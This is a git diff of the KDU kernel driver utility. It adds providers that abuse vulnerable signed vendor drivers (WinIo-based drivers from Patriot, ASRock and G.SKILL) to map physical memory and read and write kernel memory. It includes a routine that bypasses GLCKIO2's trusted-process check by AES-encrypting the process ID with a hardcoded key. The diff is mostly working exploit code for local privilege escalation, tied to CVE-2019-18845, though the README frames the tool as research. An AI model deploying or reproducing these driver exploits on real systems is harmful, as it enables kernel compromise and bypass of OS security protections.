diff --git a/Bin/kdu.exe b/Bin/kdu.exe
index 5d237d5..cd31495 100644
Binary files a/Bin/kdu.exe and b/Bin/kdu.exe differ
diff --git a/KDU.sha256 b/KDU.sha256
index eb7a11a..fd8b8c1 100644
--- a/KDU.sha256
+++ b/KDU.sha256
@@ -1,6 +1,6 @@
6ce17d185826dc452c50b1908315ff151cd57319f11ab6eb337dbe180f111fd4 *Bin\dummy.sys
eefc8b804938fa0976416ae18efa0e30e67b537e7ce50d94dba7022971d17f19 *Bin\dummy2.sys
-74f4998278e617d3470c3371d712fd9218a6e6f6f007963b66b01b13d69e5934 *Bin\kdu.exe
+03634ba3d188bae97510851348143425bd4df30f432448fd0852b8e8ad0a5d7c *Bin\kdu.exe
06cf7aeac5256e35f45da73594faa704083f94809772c218e9cbf0c86c076438 *Bin\license.txt
323d910f93683453d45239a0528d3c3cda7f2608fca864fd2a687184ffe129fe *Help\kdu1.png
a1d7a51549914833a3414a93646952c25deabe072d8a271b54e10727f923b479 *Help\kdu2.png
@@ -33,26 +33,28 @@ d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\Example
2019a70984210f2a51a5ee4e248847d63f39a8938a149f2ada3d46aa0abd5dbb *Source\Hamakaze\drvmap.h
6a8c282dd0fb89807f1901e4f956c16f84f8f601a883b1ffc79afffbe76e9799 *Source\Hamakaze\global.h
5a24f52c5c86d7d7da91bf5c06f151f9bb20ec715ca6c117b8f3e82f05a7fa80 *Source\Hamakaze\irp.h
-975cef84c77c8be845a7431f90a1d91564fdbf2eca29de12e971d96df852bc57 *Source\Hamakaze\KDU.vcxproj
-266599840dbb029c64bdc94cb5fc4c92726f03120d547a02e1ef949abe8d251f *Source\Hamakaze\KDU.vcxproj.filters
-0232e1301d7f921de4505a73d7b6df3ac1cbef8bfcdb9e53433be3a63bad25f5 *Source\Hamakaze\KDU.vcxproj.user
-66955360a66413e8527d3dfb6fd069a628f56097beeeb40f1cddebed3b613733 *Source\Hamakaze\kduprov.cpp
-1db73d6a14a13c7c3b3fdef415797ebb7c3fe2228b28048c2ae73985f73e4858 *Source\Hamakaze\kduprov.h
-b597aeae6865312703d103987f29d81b41741f6eb1b65193f8546d9e10a41d3c *Source\Hamakaze\main.cpp
+238f9e3f4ec3174b9a1b54208797b21a956175df407c0ad12500d8b7f522e6cc *Source\Hamakaze\KDU.vcxproj
+01733897e0ef01f5ea6489a0d40c1a39194ed6c7f1fc48996f0ab9dec6cb855b *Source\Hamakaze\KDU.vcxproj.filters
+548b2ca3c772769a4ed8dc4c49f59e1dfd4e1f6f8b9180e838abc1d1b2e1b43f *Source\Hamakaze\KDU.vcxproj.user
+d9325da6fffa510d38bf13cbcbea892a32058fc972c3e07169d4fc124c9327e1 *Source\Hamakaze\kduprov.cpp
+1a9e11bbc6dfc04d53c708b16a25cd4613adf2e6a266203abf9f02a5db285a9f *Source\Hamakaze\kduprov.h
+b9fa27b5bc833e59603a0298769a5b5cd03203702570f782b5a6f7f1931dd886 *Source\Hamakaze\main.cpp
bba53e5adc6f885de5d49ebf194851d733fa6ed0dbe822dcdbb83ce66432cb98 *Source\Hamakaze\pagewalk.cpp
545ecf7e669b6b28753a02e33fae6f503750d26cf0bf9089701f401fd24e0dd1 *Source\Hamakaze\pagewalk.h
4f48c6b97e236d05eb0f0f3704e461ed9c41dd9ff8bc777ba8d2e332cf27f9c0 *Source\Hamakaze\ps.cpp
d413c012b1157c4f42b7b7bc8558c9a6efcaacae87855e90b3c187b179694625 *Source\Hamakaze\ps.h
-86be07d82809b9550cf9770128897c832619644f9411eb53eb015d3c91b1db1d *Source\Hamakaze\resource.h
-29207fe4680120a400c8a2d715dcfc7c8d0cda7bb50a86ce2be594665cb66903 *Source\Hamakaze\resource.rc
+ad97469932fbb49936908bf92f4fe5c5e5ba480f228dd04ebfbf9a4f93aef9a0 *Source\Hamakaze\resource.h
+990a822ecc48ba37951a3d572cd0da5eb1e659b33135b2b4590f2b842ec4f20b *Source\Hamakaze\resource.rc
2bff6723c30c6d398ac97cb19ba915e0b9eb664d49b4d521c8eeeef1d7420ad3 *Source\Hamakaze\sup.cpp
f09de1aaf4ee3b811fb6a221f10c702b8c49b17199f1ed73a3ac51827119b460 *Source\Hamakaze\sup.h
-c8c64156d021a4455aaf4f2943c5f84c8e8c92c6b91b3d1f3c95cee8f3841cfe *Source\Hamakaze\tests.cpp
+f984d6c0aab4df7490861523f1dd85f38d0c85b4130f7ca3f712d388c40c5d9b *Source\Hamakaze\tests.cpp
e9149f07beca9c705a89d1a48273f8d7d8413b62c96d463228e853769871de33 *Source\Hamakaze\tests.h
e779b895304d6c623ac55db37b5616144dcbcf56f7a47da7660f12e36201ade0 *Source\Hamakaze\victim.cpp
f26fc0e6c1267c30701d8d2cf137bd7a191ddbbd4bcff691cef98fd060cbebcb *Source\Hamakaze\victim.h
fce521e579303ffe6322c265b129bb57e7d57b9b8db9fa401788df13593ea2d0 *Source\Hamakaze\drv\ATSZIO64.bin
+9ac009a3a4b7811e99a2778d1e81f84ea2d1fded5354761e65a3fab615802015 *Source\Hamakaze\drv\eneio64.bin
e929863625643e6d2989c591cd5b0f07533011e289c044241f08a3ab49c23994 *Source\Hamakaze\drv\gdrv.bin
+0ff7ff440111c8e0f3ceea41ddb2977ea657374c82e42ec0cc8674c61d5119b2 *Source\Hamakaze\drv\glckio2.bin
fe0048a958e0300b56b511cc0499984fc396d8dfa07c3f320a40a68ee3ee5298 *Source\Hamakaze\drv\iQVM64.bin
f0d2058856503f1673bf52a5483bd2095d842b7dac09008eb9bcb918ee6fb6e9 *Source\Hamakaze\drv\msio64.bin
0d9fd42f0f48dccc82f3034ab31b418218885ddfbc70d413bd4f585282af7d59 *Source\Hamakaze\drv\procexp.bin
@@ -65,14 +67,14 @@ b774446d2f110ce954fb0a710f4693c5562ddbd8d56fe84106f2ee80db8b50a2 *Source\Hamakaz
14853874821e94b36c4ab73ec3827a1c24a0e87c832f5c2dc48b3e691c072fd3 *Source\Hamakaze\idrv\atszio.h
bd0e4a63ea5ef237ea3aeb0e3f4e38f6945d46a53895ea2acdcd7b3da22730a6 *Source\Hamakaze\idrv\gdrv.cpp
ca98adb0dcb6da143c9f92a318330b6e5c9b5356d7c98dde86b90abde2238b73 *Source\Hamakaze\idrv\gdrv.h
-8b70e022e68e198dfe61b3e76251ac9a4b72e94ded21c1d26e81f9b1e0ef0a89 *Source\Hamakaze\idrv\msio.cpp
-968011251ac1159e9810f642944767ca4b8918b423bd36bcdb2c511b4dafa302 *Source\Hamakaze\idrv\msio.h
4bbb0d7f62f45a777ce4a301000b50a27e596a13761aff5b922a429a06ed450d *Source\Hamakaze\idrv\nal.cpp
b6bc334bbbb596fa46dd3e3aca8050f567625a861d3cd688208cfd67bd582f80 *Source\Hamakaze\idrv\nal.h
d3b41832142b78302fa8d24abe0a915c5044373fd28ac11012786e8eff20bf52 *Source\Hamakaze\idrv\rtcore.cpp
415623944767bff1bc57cc040b04cf353327cec556881420ed145b88d3188c6f *Source\Hamakaze\idrv\rtcore.h
a0ed8a22c14b35bccd1ff0f45c8b23cad0f8c3af1d8e924caf4bfd63dfb02d89 *Source\Hamakaze\idrv\rzpnk.cpp
36ec0baeec7b61dbd9936507fcf1bf5aefec08e96ffe3bcb4883785ea2d9a542 *Source\Hamakaze\idrv\rzpnk.h
+2a3423e1da977dd73feb5cc03864d59015983ac200ac393f48b074b4d989e9b8 *Source\Hamakaze\idrv\winio.cpp
+20ae49514ef66afe059974d7e0c3be33474b733e21d54c041969e0b0e962a305 *Source\Hamakaze\idrv\winio.h
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Hamakaze\minirtl\cmdline.c
bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Hamakaze\minirtl\cmdline.h
699258f2b140da030776ab418e46c6eab8ba99682677a756274fcb2402ad5c34 *Source\Hamakaze\minirtl\minirtl.h
@@ -92,3 +94,5 @@ ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Hamakaz
ee225e15f4150c64efd5e890585c8dc0d37d2572c5d54a773a319d35128c32aa *Source\Hamakaze\ntos\halamd64.h
0e1535a719ececda767b7e0e049170a4eb375329a730973f87a681dc8bd9392a *Source\Hamakaze\ntos\ntos.h
de7bdf0bd4acec31c963b916331399bce23c155e3002f0a8152a4a36af13faf8 *Source\Hamakaze\res\274.ico
+f4f160e9433e243879221d87b595bba793d175922ca9e00a62e6a7325bb65fab *Source\Hamakaze\tinyaes\aes.c
+bcdcd7fa768aef1e5b53846750585352f461746e303585a09c3933589b69aee6 *Source\Hamakaze\tinyaes\aes.h
diff --git a/README.md b/README.md
index ec298bd..bbe3dee 100644
--- a/README.md
+++ b/README.md
@@ -88,7 +88,9 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware
+ RTCore64 driver from MSI Afterburner of version 4.6.2 build 15658 and below;
+ Gdrv driver from various Gigabyte TOOLS of undefined version;
+ ATSZIO64 driver from ASUSTeK WinFlash utility of various versions;
-+ MICSYS MsIo driver from Patriot Viper RGB utility of version 1.0.
++ MICSYS MsIo (WinIo) driver from Patriot Viper RGB utility of version 1.0;
++ GLCKIO2 (WinIo) driver from ASRock Polychrome RGB of version 1.0.4;
++ EneIo (WinIo) driver from G.SKILL Trident Z Lighting Control of version 1.00.08.
More providers maybe added in the future.
@@ -109,6 +111,10 @@ In order to build from source you need Microsoft Visual Studio 2019 and later ve
Using this program might render your computer into BSOD. Compiled binary and source code provided AS-IS in help it will be useful BUT WITHOUT WARRANTY OF ANY KIND.
+# Third party code usage
+
+* TinyAES, https://github.com/kokke/tiny-AES-c
+
# References
* Turla Driver Loader, https://github.com/hfiref0x/TDL
@@ -122,6 +128,13 @@ Using this program might render your computer into BSOD. Compiled binary and sou
* CVE-2019-18845, https://www.activecyber.us/activelabs/viper-rgb-driver-local-privilege-escalation-cve-2019-18845
* DEFCON27: Get off the kernel if you cant drive, https://eclypsium.com/wp-content/uploads/2019/08/EXTERNAL-Get-off-the-kernel-if-you-cant-drive-DEFCON27.pdf
+# Wormhole drivers code
+
+They are used in multiple products from hardware vendors mostly in unmodified state. They all break OS security model and additionally bugged. Links are for educational purposes of how not to do your drivers. Note that following github accounts have nothing to do with these code, they are just forked/uploaded it.
+
+* WinIo 3.0 BSOD/CVE generator, https://github.com/starofrainnight/winio/blob/master/Source/Drv/WinIo.c
+* WinRing0 BSOD/CVE generator, https://github.com/QCute/WinRing0/blob/master/dll/sys/OpenLibSys.c
+
# Authors
(c) 2020 KDU Project
diff --git a/Source/Hamakaze/KDU.vcxproj b/Source/Hamakaze/KDU.vcxproj
index 3afb0c1..2012ac3 100644
--- a/Source/Hamakaze/KDU.vcxproj
+++ b/Source/Hamakaze/KDU.vcxproj
@@ -106,7 +106,7 @@
-
+
@@ -127,6 +127,7 @@
+
@@ -137,7 +138,7 @@
-
+
@@ -153,6 +154,7 @@
+
@@ -164,7 +166,9 @@
+
+
diff --git a/Source/Hamakaze/KDU.vcxproj.filters b/Source/Hamakaze/KDU.vcxproj.filters
index 6591921..f38c66d 100644
--- a/Source/Hamakaze/KDU.vcxproj.filters
+++ b/Source/Hamakaze/KDU.vcxproj.filters
@@ -25,6 +25,9 @@
{1df1a36e-45d4-430a-a401-9415b50be4bd}
+
+ {c53b77e9-0d5d-4eb3-91d8-1b71f16abd1d}
+
@@ -105,9 +108,12 @@
Source Files\idrv
-
+
Source Files\idrv
+
+ tinyaes
+
@@ -179,9 +185,12 @@
ntos
-
+
Source Files\idrv
+
+ tinyaes
+
@@ -215,5 +224,11 @@
Resource Files
+
+ Resource Files
+
+
+ Resource Files
+
\ No newline at end of file
diff --git a/Source/Hamakaze/KDU.vcxproj.user b/Source/Hamakaze/KDU.vcxproj.user
index 44fc343..da6f48d 100644
--- a/Source/Hamakaze/KDU.vcxproj.user
+++ b/Source/Hamakaze/KDU.vcxproj.user
@@ -1,7 +1,7 @@
- -list
+ -test
WindowsLocalDebugger
\ No newline at end of file
diff --git a/Source/Hamakaze/drv/eneio64.bin b/Source/Hamakaze/drv/eneio64.bin
new file mode 100644
index 0000000..a97c95f
Binary files /dev/null and b/Source/Hamakaze/drv/eneio64.bin differ
diff --git a/Source/Hamakaze/drv/glckio2.bin b/Source/Hamakaze/drv/glckio2.bin
new file mode 100644
index 0000000..5cc589c
Binary files /dev/null and b/Source/Hamakaze/drv/glckio2.bin differ
diff --git a/Source/Hamakaze/idrv/msio.cpp b/Source/Hamakaze/idrv/winio.cpp
similarity index 50%
rename from Source/Hamakaze/idrv/msio.cpp
rename to Source/Hamakaze/idrv/winio.cpp
index 69d2d45..d1c2ec4 100644
--- a/Source/Hamakaze/idrv/msio.cpp
+++ b/Source/Hamakaze/idrv/winio.cpp
@@ -2,13 +2,13 @@
*
* (C) COPYRIGHT AUTHORS, 2020
*
-* TITLE: MSIO.CPP
+* TITLE: WINIO.CPP
*
-* VERSION: 1.00
+* VERSION: 1.01
*
-* DATE: 07 Feb 2020
+* DATE: 12 Feb 2020
*
-* MICSYS MSIO driver routines.
+* WINIO based drivers routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -18,21 +18,50 @@
*******************************************************************************/
#include "global.h"
-#include "idrv/msio.h"
+#include "idrv/winio.h"
+
+#ifdef __cplusplus
+extern "C" {
+#include "tinyaes/aes.h"
+}
+#endif
+//
+// Generic WINIO interface for all supported drivers based on WINIO code.
//
// MICSYS RGB driver interface for CVE-2019-18845.
+// Ptolemy Tech Co., Ltd ENE driver interface
+// G.Skill EneIo64 driver interface
+// ... and multiple others
//
+typedef PVOID(WINAPI* pfnWinIoGenericMapMemory)(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_ ULONG NumberOfBytes,
+ _Out_ HANDLE* SectionHandle,
+ _Out_ PVOID* ReferencedObject);
+
+typedef VOID(WINAPI* pfnWinIoGenericUnmapMemory)(
+ _In_ HANDLE DeviceHandle,
+ _In_ PVOID SectionToUnmap,
+ _In_ HANDLE SectionHandle,
+ _In_ PVOID ReferencedObject);
+
+
+pfnWinIoGenericMapMemory g_WinIoMapMemoryRoutine;
+pfnWinIoGenericUnmapMemory g_WinIoUnmapMemoryRoutine;
+BOOL g_PhysAddress64bit = FALSE;
+
/*
-* MsioCallDriver
+* WinIoCallDriver
*
* Purpose:
*
-* Call Patriot Msio driver.
+* Call WinIo driver.
*
*/
-BOOL MsioCallDriver(
+BOOL WinIoCallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
_In_ PVOID InputBuffer,
@@ -60,19 +89,19 @@ BOOL MsioCallDriver(
}
/*
-* MsioMapMemory
+* MsIoMapMemory
*
* Purpose:
*
* Map physical memory through \Device\PhysicalMemory.
*
*/
-PVOID MsioMapMemory(
+PVOID MsIoMapMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR PhysicalAddress,
_In_ ULONG NumberOfBytes,
- _Out_ HANDLE *SectionHandle,
- _Out_ PVOID *ReferencedObject)
+ _Out_ HANDLE* SectionHandle,
+ _Out_ PVOID* ReferencedObject)
{
MSIO_PHYSICAL_MEMORY_INFO request;
@@ -81,9 +110,9 @@ PVOID MsioMapMemory(
RtlSecureZeroMemory(&request, sizeof(request));
request.ViewSize = PhysicalAddress + NumberOfBytes;
-
- if (MsioCallDriver(DeviceHandle,
- IOCTL_MSIO_MAP_USER_PHYSICAL_MEMORY,
+
+ if (WinIoCallDriver(DeviceHandle,
+ IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY,
&request,
sizeof(request),
&request,
@@ -98,14 +127,14 @@ PVOID MsioMapMemory(
}
/*
-* MsioUnmapMemory
+* MsIoUnmapMemory
*
* Purpose:
*
* Unmap previously mapped physical memory.
*
*/
-VOID MsioUnmapMemory(
+VOID MsIoUnmapMemory(
_In_ HANDLE DeviceHandle,
_In_ PVOID SectionToUnmap,
_In_ HANDLE SectionHandle,
@@ -119,8 +148,8 @@ VOID MsioUnmapMemory(
request.ReferencedObject = ReferencedObject;
request.SectionHandle = SectionHandle;
- MsioCallDriver(DeviceHandle,
- IOCTL_MSIO_UNMAP_USER_PHYSICAL_MEMORY,
+ WinIoCallDriver(DeviceHandle,
+ IOCTL_WINIO_UNMAP_USER_PHYSICAL_MEMORY,
&request,
sizeof(request),
&request,
@@ -128,14 +157,84 @@ VOID MsioUnmapMemory(
}
/*
-* MsioQueryPML4Value
+* WinIoMapMemory
+*
+* Purpose:
+*
+* Map physical memory through \Device\PhysicalMemory.
+*
+*/
+PVOID WinIoMapMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_ ULONG NumberOfBytes,
+ _Out_ HANDLE* SectionHandle,
+ _Out_ PVOID* ReferencedObject)
+{
+ WINIO_PHYSICAL_MEMORY_INFO request;
+
+ *SectionHandle = NULL;
+ *ReferencedObject = NULL;
+
+ RtlSecureZeroMemory(&request, sizeof(request));
+ request.ViewSize = NumberOfBytes;
+ request.BusAddress = PhysicalAddress;
+
+ if (WinIoCallDriver(DeviceHandle,
+ IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY,
+ &request,
+ sizeof(request),
+ &request,
+ sizeof(request)))
+ {
+ *SectionHandle = request.SectionHandle;
+ *ReferencedObject = request.ReferencedObject;
+ return request.BaseAddress;
+ }
+
+ return NULL;
+}
+
+/*
+* WinIoUnmapMemory
+*
+* Purpose:
+*
+* Unmap previously mapped physical memory.
+*
+*/
+VOID WinIoUnmapMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ PVOID SectionToUnmap,
+ _In_ HANDLE SectionHandle,
+ _In_ PVOID ReferencedObject
+)
+{
+ WINIO_PHYSICAL_MEMORY_INFO request;
+
+ RtlSecureZeroMemory(&request, sizeof(request));
+ request.BaseAddress = SectionToUnmap;
+ request.ReferencedObject = ReferencedObject;
+ request.SectionHandle = SectionHandle;
+
+ WinIoCallDriver(DeviceHandle,
+ IOCTL_WINIO_UNMAP_USER_PHYSICAL_MEMORY,
+ &request,
+ sizeof(request),
+ &request,
+ sizeof(request));
+}
+
+
+/*
+* WinIoQueryPML4Value
*
* Purpose:
*
* Locate PML4.
*
*/
-BOOL WINAPI MsioQueryPML4Value(
+BOOL WINAPI WinIoQueryPML4Value(
_In_ HANDLE DeviceHandle,
_Out_ ULONG_PTR* Value)
{
@@ -149,7 +248,7 @@ BOOL WINAPI MsioQueryPML4Value(
do {
- pbLowStub1M = (ULONG_PTR)MsioMapMemory(DeviceHandle,
+ pbLowStub1M = (ULONG_PTR)g_WinIoMapMemoryRoutine(DeviceHandle,
0ULL,
0x100000,
§ionHandle,
@@ -166,9 +265,9 @@ BOOL WINAPI MsioQueryPML4Value(
else
*Value = 0;
- MsioUnmapMemory(DeviceHandle,
- (PVOID)pbLowStub1M,
- sectionHandle,
+ g_WinIoUnmapMemoryRoutine(DeviceHandle,
+ (PVOID)pbLowStub1M,
+ sectionHandle,
refObject);
dwError = ERROR_SUCCESS;
@@ -180,14 +279,14 @@ BOOL WINAPI MsioQueryPML4Value(
}
/*
-* MsioReadWritePhysicalMemory
+* WinIoReadWritePhysicalMemory
*
* Purpose:
*
* Read/Write physical memory.
*
*/
-BOOL WINAPI MsioReadWritePhysicalMemory(
+BOOL WINAPI WinIoReadWritePhysicalMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR PhysicalAddress,
_In_ PVOID Buffer,
@@ -205,7 +304,7 @@ BOOL WINAPI MsioReadWritePhysicalMemory(
//
// Map physical memory section.
//
- mappedSection = MsioMapMemory(DeviceHandle,
+ mappedSection = g_WinIoMapMemoryRoutine(DeviceHandle,
PhysicalAddress,
NumberOfBytes,
§ionHandle,
@@ -218,10 +317,20 @@ BOOL WINAPI MsioReadWritePhysicalMemory(
__try {
if (DoWrite) {
- RtlCopyMemory(RtlOffsetToPointer(mappedSection, offset), Buffer, NumberOfBytes);
+ if (g_PhysAddress64bit) {
+ RtlCopyMemory(mappedSection, Buffer, NumberOfBytes);
+ }
+ else {
+ RtlCopyMemory(RtlOffsetToPointer(mappedSection, offset), Buffer, NumberOfBytes);
+ }
}
else {
- RtlCopyMemory(Buffer, RtlOffsetToPointer(mappedSection, offset), NumberOfBytes);
+ if (g_PhysAddress64bit) {
+ RtlCopyMemory(Buffer, mappedSection, NumberOfBytes);
+ }
+ else {
+ RtlCopyMemory(Buffer, RtlOffsetToPointer(mappedSection, offset), NumberOfBytes);
+ }
}
bResult = TRUE;
@@ -235,11 +344,11 @@ BOOL WINAPI MsioReadWritePhysicalMemory(
//
// Unmap physical memory section.
//
- MsioUnmapMemory(DeviceHandle,
+ g_WinIoUnmapMemoryRoutine(DeviceHandle,
mappedSection,
sectionHandle,
refObject);
-
+
}
else {
dwError = GetLastError();
@@ -250,20 +359,20 @@ BOOL WINAPI MsioReadWritePhysicalMemory(
}
/*
-* MsioReadPhysicalMemory
+* WinIoReadPhysicalMemory
*
* Purpose:
*
* Read from physical memory.
*
*/
-BOOL WINAPI MsioReadPhysicalMemory(
+BOOL WINAPI WinIoReadPhysicalMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR PhysicalAddress,
_In_ PVOID Buffer,
_In_ ULONG NumberOfBytes)
{
- return MsioReadWritePhysicalMemory(DeviceHandle,
+ return WinIoReadWritePhysicalMemory(DeviceHandle,
PhysicalAddress,
Buffer,
NumberOfBytes,
@@ -271,20 +380,20 @@ BOOL WINAPI MsioReadPhysicalMemory(
}
/*
-* MsioWritePhysicalMemory
+* WinIoWritePhysicalMemory
*
* Purpose:
*
* Write to physical memory.
*
*/
-BOOL WINAPI MsioWritePhysicalMemory(
+BOOL WINAPI WinIoWritePhysicalMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR PhysicalAddress,
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes)
{
- return MsioReadWritePhysicalMemory(DeviceHandle,
+ return WinIoReadWritePhysicalMemory(DeviceHandle,
PhysicalAddress,
Buffer,
NumberOfBytes,
@@ -292,14 +401,14 @@ BOOL WINAPI MsioWritePhysicalMemory(
}
/*
-* MsioVirtualToPhysical
+* WinIoVirtualToPhysical
*
* Purpose:
*
* Translate virtual address to the physical.
*
*/
-BOOL WINAPI MsioVirtualToPhysical(
+BOOL WINAPI WinIoVirtualToPhysical(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR VirtualAddress,
_Out_ ULONG_PTR* PhysicalAddress)
@@ -314,8 +423,8 @@ BOOL WINAPI MsioVirtualToPhysical(
}
bResult = PwVirtualToPhysical(DeviceHandle,
- (provQueryPML4)MsioQueryPML4Value,
- (provReadPhysicalMemory)MsioReadPhysicalMemory,
+ (provQueryPML4)WinIoQueryPML4Value,
+ (provReadPhysicalMemory)WinIoReadPhysicalMemory,
VirtualAddress,
PhysicalAddress);
@@ -323,14 +432,14 @@ BOOL WINAPI MsioVirtualToPhysical(
}
/*
-* MsioReadKernelVirtualMemory
+* WinIoReadKernelVirtualMemory
*
* Purpose:
*
-* Read virtual memory via MSIO.
+* Read virtual memory.
*
*/
-BOOL WINAPI MsioReadKernelVirtualMemory(
+BOOL WINAPI WinIoReadKernelVirtualMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR Address,
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
@@ -340,13 +449,13 @@ BOOL WINAPI MsioReadKernelVirtualMemory(
ULONG_PTR physicalAddress = 0;
DWORD dwError = ERROR_SUCCESS;
- bResult = MsioVirtualToPhysical(DeviceHandle,
+ bResult = WinIoVirtualToPhysical(DeviceHandle,
Address,
&physicalAddress);
if (bResult) {
- bResult = MsioReadWritePhysicalMemory(DeviceHandle,
+ bResult = WinIoReadWritePhysicalMemory(DeviceHandle,
physicalAddress,
Buffer,
NumberOfBytes,
@@ -365,14 +474,14 @@ BOOL WINAPI MsioReadKernelVirtualMemory(
}
/*
-* MsioWriteKernelVirtualMemory
+* WinIoWriteKernelVirtualMemory
*
* Purpose:
*
-* Write virtual memory via MSIO.
+* Write virtual memory.
*
*/
-BOOL WINAPI MsioWriteKernelVirtualMemory(
+BOOL WINAPI WinIoWriteKernelVirtualMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR Address,
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
@@ -382,13 +491,13 @@ BOOL WINAPI MsioWriteKernelVirtualMemory(
ULONG_PTR physicalAddress = 0;
DWORD dwError = ERROR_SUCCESS;
- bResult = MsioVirtualToPhysical(DeviceHandle,
+ bResult = WinIoVirtualToPhysical(DeviceHandle,
Address,
&physicalAddress);
if (bResult) {
- bResult = MsioReadWritePhysicalMemory(DeviceHandle,
+ bResult = WinIoReadWritePhysicalMemory(DeviceHandle,
physicalAddress,
Buffer,
NumberOfBytes,
@@ -405,3 +514,78 @@ BOOL WINAPI MsioWriteKernelVirtualMemory(
SetLastError(dwError);
return bResult;
}
+
+/*
+* GlckIo2Register
+*
+* Purpose:
+*
+* Register in GlckIo2 "trusted" process list.
+*
+*/
+BOOL GlckIo2Register(
+ _In_ HANDLE DeviceHandle)
+{
+ AES_ctx ctx;
+ ULONG_PTR encryptedProcessId;
+ UCHAR Buffer[16];
+ BYTE OutBuf[512];
+ ULONG AES128Key[4] = { 0x16157eaa, 0xa6d2ae28, 0x8815f7ab, 0x3c4fcf09 };
+
+ RtlSecureZeroMemory(&ctx, sizeof(ctx));
+
+ AES_init_ctx(&ctx, (uint8_t*)&AES128Key);
+
+ encryptedProcessId = SWAP_UINT32(GetCurrentProcessId());
+
+ RtlSecureZeroMemory(&Buffer, sizeof(Buffer));
+ RtlCopyMemory(&Buffer, &encryptedProcessId, sizeof(ULONG_PTR));
+ AES_ECB_encrypt(&ctx, (uint8_t*)&Buffer);
+
+ return WinIoCallDriver(DeviceHandle,
+ IOCTL_GKCKIO2_REGISTER,
+ &Buffer,
+ sizeof(Buffer),
+ &OutBuf,
+ sizeof(OutBuf));
+}
+
+/*
+* WinIoRegisterDriver
+*
+* Purpose:
+*
+* Register WinIo driver.
+*
+*/
+BOOL WINAPI WinIoRegisterDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param)
+{
+ ULONG DriverId = PtrToUlong(Param);
+
+ switch (DriverId) {
+ case IDR_GLCKIO2:
+ g_WinIoMapMemoryRoutine = WinIoMapMemory;
+ g_WinIoUnmapMemoryRoutine = WinIoUnmapMemory;
+ g_PhysAddress64bit = TRUE;
+
+ if (!GlckIo2Register(DeviceHandle))
+ return FALSE;
+
+ break;
+
+ case IDR_MSIO64:
+ g_WinIoMapMemoryRoutine = MsIoMapMemory;
+ g_WinIoUnmapMemoryRoutine = MsIoUnmapMemory;
+ g_PhysAddress64bit = FALSE;
+ break;
+ default:
+ g_WinIoMapMemoryRoutine = WinIoMapMemory;
+ g_WinIoUnmapMemoryRoutine = WinIoUnmapMemory;
+ g_PhysAddress64bit = TRUE;
+ break;
+ }
+
+ return TRUE;
+}
diff --git a/Source/Hamakaze/idrv/msio.h b/Source/Hamakaze/idrv/winio.h
similarity index 51%
rename from Source/Hamakaze/idrv/msio.h
rename to Source/Hamakaze/idrv/winio.h
index 02c8316..2f928c5 100644
--- a/Source/Hamakaze/idrv/msio.h
+++ b/Source/Hamakaze/idrv/winio.h
@@ -2,13 +2,13 @@
*
* (C) COPYRIGHT AUTHORS, 2020
*
-* TITLE: MSIO.H
+* TITLE: WINIO.H
*
-* VERSION: 1.00
+* VERSION: 1.01
*
-* DATE: 07 Feb 2020
+* DATE: 12 Feb 2020
*
-* MICSYS MSIO driver interface header.
+* WINIO based drivers interface header.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -20,23 +20,38 @@
#pragma once
//
-// MICSYS driver interface for CVE-2019-18845.
+// Generic WINIO interface for all supported drivers based on WINIO code.
//
+// MICSYS RGB driver interface for CVE-2019-18845.
+// Ptolemy Tech Co., Ltd ENE driver interface
+// G.Skill EneIo64 driver interface
+// ... and multiple others
+//
+
+#define FILE_DEVICE_WINIO (DWORD)0x00008010
+
+#define WINIO_IOCTL_INDEX (DWORD)0x810
+
+#define WINIO_MAP_FUNCID (DWORD)0x810
+#define WINIO_UNMAP_FUNCID (DWORD)0x811
+
+#define GLCKIO2_REGISTER_FUNCID (DWORD)0x818
-#define MICSYS_DEVICE_TYPE (DWORD)0x8010
+#define IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY \
+ CTL_CODE(FILE_DEVICE_WINIO, WINIO_MAP_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80102040
-#define MSIO_MAP_FUNCID (DWORD)0x810
-#define MSIO_UNMAP_FUNCID (DWORD)0x811
+#define IOCTL_WINIO_UNMAP_USER_PHYSICAL_MEMORY \
+ CTL_CODE(FILE_DEVICE_WINIO, WINIO_UNMAP_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80102044
-#define IOCTL_MSIO_MAP_USER_PHYSICAL_MEMORY \
- CTL_CODE(MICSYS_DEVICE_TYPE, MSIO_MAP_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80102040
+#define IOCTL_GKCKIO2_REGISTER \
+ CTL_CODE(FILE_DEVICE_WINIO, GLCKIO2_REGISTER_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS)
+
